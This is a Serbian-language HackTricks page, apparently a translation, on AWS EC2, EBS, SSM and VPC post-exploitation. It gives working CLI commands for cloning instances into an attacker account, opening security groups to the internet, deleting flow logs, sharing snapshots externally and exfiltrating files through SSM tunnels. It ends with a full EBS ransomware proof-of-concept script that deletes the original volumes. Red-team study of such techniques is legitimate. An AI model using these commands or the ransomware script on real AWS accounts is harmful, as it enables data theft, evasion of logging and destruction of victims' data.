AWS - EC2, EBS, SSM & VPC Post Exploitation

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

EC2 & VPC

Za više informacija pogledajte:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

Malicious VPC Mirror - ec2:DescribeInstances, ec2:RunInstances, ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress, ec2:CreateTrafficMirrorTarget, ec2:CreateTrafficMirrorSession, ec2:CreateTrafficMirrorFilter, ec2:CreateTrafficMirrorFilterRule

VPC traffic mirroring duplira ulazni i izlazni saobraćaj za EC2 instances unutar VPC-a bez potrebe da se bilo šta instalira na same instances. Ovaj duplikovani saobraćaj obično se šalje nečemu poput network intrusion detection system (IDS) za analizu i nadzor.
Napadač može to zloupotrebiti da presretne sav saobraćaj i dođe do osetljivih informacija:

Za više informacija pogledajte ovu stranicu:

AWS - Malicious VPC Mirror

Copy Running Instance

Instances obično sadrže neku vrstu osetljivih informacija. Postoje različiti načini da se uđe (check EC2 privilege escalation tricks). Međutim, drugi način da se proveri šta sadrži je da se kreira AMI i pokrene nova instance (čak i u vašem sopstvenom account) iz nje:

# List instances
aws ec2 describe-images

# create a new image for the instance-id
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# add key to AWS
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# now you can check the instance
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# If needed : edit groups
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01"  --region eu-west-1

# be a good guy, clean our instance to avoid any useless cost
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1

EBS Snapshot dump

Snapshots su backupi volumena, koji obično sadrže osetljive informacije, zato njihova provera obično otkriva te informacije.
Ako nađete volumen bez snapshot-a možete: kreirati snapshot i izvršiti sledeće akcije ili ga jednostavno mount-ovati u instance unutar naloga:

AWS - EBS Snapshot Dump

Covert Disk Exfiltration via AMI Store-to-S3

Izvezite EC2 AMI direktno u S3 koristeći CreateStoreImageTask da biste dobili raw disk image bez deljenja snapshot-a. Ovo omogućava kompletnu offline forenziku ili krađu podataka, dok se networking instance ostavlja netaknut.

AWS – Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)

Live Data Theft via EBS Multi-Attach

Povežite io1/io2 Multi-Attach volume na drugu instance i mount-ujte ga read-only da biste izvlačili podatke u realnom vremenu bez snapshot-a. Korisno kada victim volume već ima Multi-Attach omogućen u istoj AZ.

AWS - Live Data Theft via EBS Multi-Attach

EC2 Instance Connect Endpoint Backdoor

Kreirajte EC2 Instance Connect Endpoint, autorizujte ingress i injektujte ephemarne SSH ključeve za pristup privatnim instancama preko managed tunela. Omogućava brze lateralne pokrete bez otvaranja javnih portova.

AWS - EC2 Instance Connect Endpoint backdoor + ephemeral SSH key injection

EC2 ENI Secondary Private IP Hijack

Premestite sekundarni privatni IP victim ENI-ja na ENI pod kontrolom napadača da biste se predstavljali kao trusted hostovi koji su allowlisted po IP-u. Omogućava zaobilaženje internal ACL-ova ili SG pravila vezanih za specifične adrese.

AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)

Elastic IP Hijack for Ingress/Egress Impersonation

Ponovo dodelite Elastic IP sa victim instance na napadača da presretnete inbound traffic ili inicirate outbound konekcije koje izgledaju kao da dolaze sa trusted javnih IP-ova.

AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

Security Group Backdoor via Managed Prefix Lists

Ako security group pravilo referencira customer-managed prefix list, dodavanje attacker CIDR-ova u listu tiho širi pristup kroz svako zavisno SG pravilo bez modifikovanja samog SG-a.

AWS - Security Group Backdoor via Managed Prefix Lists

VPC Endpoint Egress Bypass

Kreirajte gateway ili interface VPC endpoints da povratite outbound pristup iz izolovanih subnet-a. Korišćenje AWS-managed private links zaobilazi nedostajuće IGW/NAT kontrole za eksfiltraciju podataka.

AWS – Egress Bypass from Isolated Subnets via VPC Endpoints

ec2:AuthorizeSecurityGroupIngress

Napadač sa permisijom ec2:AuthorizeSecurityGroupIngress može dodati inbound pravila u security groups (na primer, dozvoliti tcp:80 sa 0.0.0.0/0), čime izlaže interne servise javnom Internetu ili drugim neautorizovanim mrežama.

aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0

ec2:ReplaceNetworkAclEntry

Napadač sa privilegijama ec2:ReplaceNetworkAclEntry (ili sličnim) može izmeniti Network ACLs (NACLs) subneta da ih učini veoma permisivnim — na primer dozvoljavajući 0.0.0.0/0 na kritičnim portovima — čime se ceo opseg subneta izlaže Internetu ili neautorizovanim mrežnim segmentima. Za razliku od Security Groups, koje se primenjuju per-instance, NACLs se primenjuju na nivou subneta, pa promena restriktivnog NACL-a može imati znatno veći blast radius jer omogućava pristup mnogo više hosts.

aws ec2 replace-network-acl-entry \
--network-acl-id <ACL_ID> \
--rule-number 100 \
--protocol <PROTOCOL> \
--rule-action allow \
--egress <true|false> \
--cidr-block 0.0.0.0/0

ec2:Delete*

Napadač sa ec2:Delete* i iam:Remove* dozvolama može obrisati kritične infrastrukturne resurse i konfiguracije — na primer key pairs, launch templates/versions, AMIs/snapshots, volumes ili attachments, security groups ili rules, ENIs/network endpoints, route tables, gateways, ili managed endpoints. Ovo može izazvati trenutni prekid usluge, gubitak podataka i gubitak forenzičkih dokaza.

Jedan primer je brisanje security group:

aws ec2 delete-security-group
–group-id <SECURITY_GROUP_ID>

VPC Flow Logs Cross-Account Exfiltration

Usmerite VPC Flow Logs na S3 bucket koji kontroliše napadač kako biste kontinuirano prikupljali mrežne meta-podatke (source/destination, ports) izvan naloga žrtve za dugoročno izviđanje.

AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Data Exfiltration

DNS Exfiltration

Čak i ako zaključate EC2 tako da nijedan saobraćaj ne može da izađe, još uvek može exfil via DNS.

• VPC Flow Logs neće zabeležiti ovo.
• Nemate pristup AWS DNS logovima.
• Onemogućite ovo postavljanjem “enableDnsSupport” na false pomoću:

aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>

Exfiltration via API calls

Napadač može pozivati API endpoint-e naloga koji on kontroliše. Cloudtrail će zabeležiti ove pozive i napadač će moći da vidi exfiltrate data u Cloudtrail logovima.

Otvaranje security group

Možete dobiti dodatni pristup mrežnim servisima otvaranjem portova na sledeći način:

aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC

Privesc to ECS

Moguće je pokrenuti EC2 instancu i registrovati je da se koristi za pokretanje ECS instanci, a zatim ukrasti podatke ECS instanci.

For more information check this.

Ukloni VPC flow logs

aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>

SSM Port Forwarding

Required permissions:

• ssm:StartSession

Pored izvršavanja komandi, SSM omogućava tunelovanje saobraćaja koje se može zloupotrebiti za pivot sa EC2 instanci koje nemaju mrežni pristup zbog Security Groups ili NACLs. Jedan od scenarija gde je ovo korisno je pivoting sa Bastion Host na privatni EKS cluster.

Da biste započeli sesiju, potrebno je da imate instaliran SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

1. Instalirajte SessionManagerPlugin na vašem računaru
2. Prijavite se na Bastion EC2 koristeći sledeću komandu:

aws ssm start-session --target "$INSTANCE_ID"

3. Preuzmite AWS privremene kredencijale Bastion EC2 pomoću skripte Abusing SSRF in AWS EC2 environment
4. Prebacite kredencijale na svoj računar u fajl $HOME/.aws/credentials kao profil [bastion-ec2]
5. Prijavite se na EKS kao Bastion EC2:

aws eks update-kubeconfig --profile bastion-ec2 --region <EKS-CLUSTER-REGION> --name <EKS-CLUSTER-NAME>

6. Ažurirajte polje server u fajlu $HOME/.kube/config da pokazuje na https://localhost
7. Kreirajte SSM tunel na sledeći način:

sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":["<TARGET-IP-OR-DOMAIN>"],"portNumber":["443"], "localPortNumber":["443"]}' --region <BASTION-INSTANCE-REGION>

8. Saobraćaj iz kubectl alata sada se prosleđuje kroz SSM tunel preko Bastion EC2 i možete pristupiti privatnom EKS klasteru sa svoje mašine pokretanjem:

kubectl get pods --insecure-skip-tls-verify

Imajte na umu da će SSL connections propasti osim ako ne postavite zastavicu --insecure-skip-tls-verify (ili njen ekvivalent u K8s audit alatima). Pošto je saobraćaj tunelovan kroz sigurni AWS SSM tunel, zaštićeni ste od bilo kakvih MitM napada.

Na kraju, ova tehnika nije specifična samo za napadanje privatnih EKS klastera. Možete postaviti proizvoljne domene i portove da pivotirate na bilo koju drugu AWS uslugu ili prilagođenu aplikaciju.

Brzo lokalno ↔ udaljeno prosleđivanje porta (AWS-StartPortForwardingSession)

Ako treba da prosledite samo jedan TCP port sa EC2 instance na vaš lokalni host možete koristiti AWS-StartPortForwardingSession SSM dokument (nije potreban parametar remote host):

aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8000","localPortNumber"="8000" \
--region <REGION>

The command establishes a bidirectional tunnel between your workstation (localPortNumber) and the selected port (portNumber) on the instance without opening any inbound Security-Group rules.

Uobičajeni slučajevi upotrebe:

• File exfiltration

1. Na instanci pokrenite kratak HTTP server koji pokazuje na direktorijum koji želite da exfiltrate:

python3 -m http.server 8000

2. Sa vaše radne stanice preuzmite fajlove kroz SSM tunel:

curl http://localhost:8000/loot.txt -o loot.txt

• Pristupanje internim web aplikacijama (npr. Nessus)

# Forward remote Nessus port 8834 to local 8835
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8834","localPortNumber"="8835"
# Browse to http://localhost:8835

Savet: Kompresujte i enkriptujte dokaze pre eksfiltracije kako CloudTrail ne bi zabeležio sadržaj u čistom tekstu:

# On the instance
7z a evidence.7z /path/to/files/* -p'Str0ngPass!'

Deljenje AMI

aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

Pretraga osetljivih informacija u javnim i privatnim AMI-ima

• https://github.com/saw-your-packet/CloudShovel: CloudShovel je alat namenjen da pretražuje osetljive informacije u javnim ili privatnim Amazon Machine Images (AMIs). Automatizuje proces pokretanja instanci iz ciljanih AMI-ja, montiranja njihovih volumena i skeniranja radi pronalaženja potencijalnih tajni ili osetljivih podataka.

Deljenje EBS Snapshot-a

aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

EBS Ransomware PoC

Proof of concept sličan Ransomware demonstraciji prikazanoj u S3 post-exploitation notes. KMS bi trebalo preimenovati u RMS (Ransomware Management Service) s obzirom na to koliko je lako koristiti ga za enkriptovanje različitih AWS servisa.

Prvo, iz ‘attacker’ AWS account-a, kreirajte customer managed key u KMS. Za ovaj primer pustićemo da AWS upravlja key data-om, ali u realističnom scenariju malicious actor bi zadržao key data izvan AWS’ove kontrole. Promenite key policy da dozvoli bilo kom AWS account Principal-u da koristi key. Za ovu key policy, ime account-a je bilo ‘AttackSim’, a policy rule koja dozvoljava potpuni pristup zove se ‘Outside Encryption’.

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Outside Encryption",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey",
"kms:GenerateDataKeyWithoutPlainText",
"kms:CreateGrant"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:CreateGrant",
"kms:ListGrants",
"kms:RevokeGrant"
],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}

The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume:

• kms:CreateGrant
• kms:Decrypt
• kms:DescribeKey
• kms:GenerateDataKeyWithoutPlainText
• kms:ReEncrypt

Now with the publicly accessible key to use. We can use a ‘victim’ account that has some EC2 instances spun up with unencrypted EBS volumes attached. This ‘victim’ account’s EBS volumes are what we’re targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account.

Slično primeru S3 ransomware-a. Ovaj napad će napraviti kopije pridruženih EBS volumena koristeći snapshots, upotrebiti javno dostupan ključ iz ‘attacker’ account-a da enkriptuje nove EBS volumene, zatim odvojiti originalne EBS volumene od EC2 instanci i obrisati ih, i na kraju obrisati snapshots koji su korišćeni za kreiranje novokreiranih enkriptovanih EBS volumena.

This results in only encrypted EBS volumes left available in the account.

Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now.

Next, return to the key policy in the ‘attacker’ account and remove the ‘Outside Encryption’ policy rule from the key policy.

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}

Sačekajte trenutak da novo postavljena key policy propagira. Zatim se vratite na ‘victim’ account i pokušajte da attach-ujete jedan od novo-enkriptovanih EBS volumes. Videćete da možete attach-ovati volume.

Međutim, kada pokušate da zaista pokrenete EC2 instance sa prikačenim enkriptovanim EBS volume-om, pokretanje će jednostavno propasti i instanca će preći iz ‘pending’ stanja nazad u ‘stopped’ stanje zauvek, jer prikačeni EBS volumen ne može biti dekriptovan pomoću ključa budući da key policy više to ne dozvoljava.

Ovo je python skripta koja je korišćena. Uzima AWS creds za ‘victim’ account i javno dostupnu AWS ARN vrednost ključa koji će se koristiti za encryption. Skripta će napraviti enkriptovane kopije SVIH dostupnih EBS volumena prikačenih na SVE EC2 instance u ciljanom AWS accountu, zatim zaustaviti svaku EC2 instancu, detach-ovati originalne EBS volumene, obrisati ih, i na kraju obrisati sve snapshots korišćene tokom procesa. To će ostaviti samo enkriptovane EBS volumene u ciljanom ‘victim’ accountu. KORISTITE OVU SKRIPTU SAMO U TEST OKRUŽENJU, JER JE DESTRUKTIVNA I OBRISAĆE SVE ORIGINALNE EBS VOLUMENE. Možete ih oporaviti koristeći korišćeni KMS key i vratiti ih u prvobitno stanje putem snapshots-a, ali želim da vas upozorim da je ovo na kraju dana ransomware PoC.

import boto3
import argparse
from botocore.exceptions import ClientError

def enumerate_ec2_instances(ec2_client):
instances = ec2_client.describe_instances()
instance_volumes = {}
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
instance_id = instance['InstanceId']
volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
instance_volumes[instance_id] = volumes
return instance_volumes

def snapshot_volumes(ec2_client, volumes):
snapshot_ids = []
for volume_id in volumes:
snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
snapshot_ids.append(snapshot['SnapshotId'])
return snapshot_ids

def wait_for_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])

def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
new_volume_ids = []
for snapshot_id in snapshot_ids:
snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
volume_id = snapshot_info['VolumeId']
volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
availability_zone = volume_info['AvailabilityZone']

volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
Encrypted=True, KmsKeyId=kms_key_arn)
new_volume_ids.append(volume['VolumeId'])
return new_volume_ids

def stop_instances(ec2_client, instance_ids):
for instance_id in instance_ids:
try:
instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']

if instance_state == 'running':
ec2_client.stop_instances(InstanceIds=[instance_id])
print(f"Stopping instance: {instance_id}")
ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
print(f"Instance {instance_id} stopped.")
else:
print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")

except ClientError as e:
print(f"Error stopping instance {instance_id}: {e}")

def detach_and_delete_volumes(ec2_client, volumes):
for volume_id in volumes:
try:
ec2_client.detach_volume(VolumeId=volume_id)
ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
ec2_client.delete_volume(VolumeId=volume_id)
print(f"Deleted volume: {volume_id}")
except ClientError as e:
print(f"Error detaching or deleting volume {volume_id}: {e}")


def delete_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
try:
ec2_client.delete_snapshot(SnapshotId=snapshot_id)
print(f"Deleted snapshot: {snapshot_id}")
except ClientError as e:
print(f"Error deleting snapshot {snapshot_id}: {e}")

def replace_volumes(ec2_client, instance_volumes):
instance_ids = list(instance_volumes.keys())
stop_instances(ec2_client, instance_ids)

all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
detach_and_delete_volumes(ec2_client, all_volumes)

def ebs_lock(access_key, secret_key, region, kms_key_arn):
ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)

instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed

def parse_arguments():
parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
parser.add_argument('--region', required=True, help='AWS Region')
parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
return parser.parse_args()

def main():
args = parse_arguments()
ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)

instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
replace_volumes(ec2_client, instance_volumes)
delete_snapshots(ec2_client, snapshot_ids)

if __name__ == "__main__":
main()

Reference

• Pentest Partners – Kako preneti fajlove u AWS koristeći SSM

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.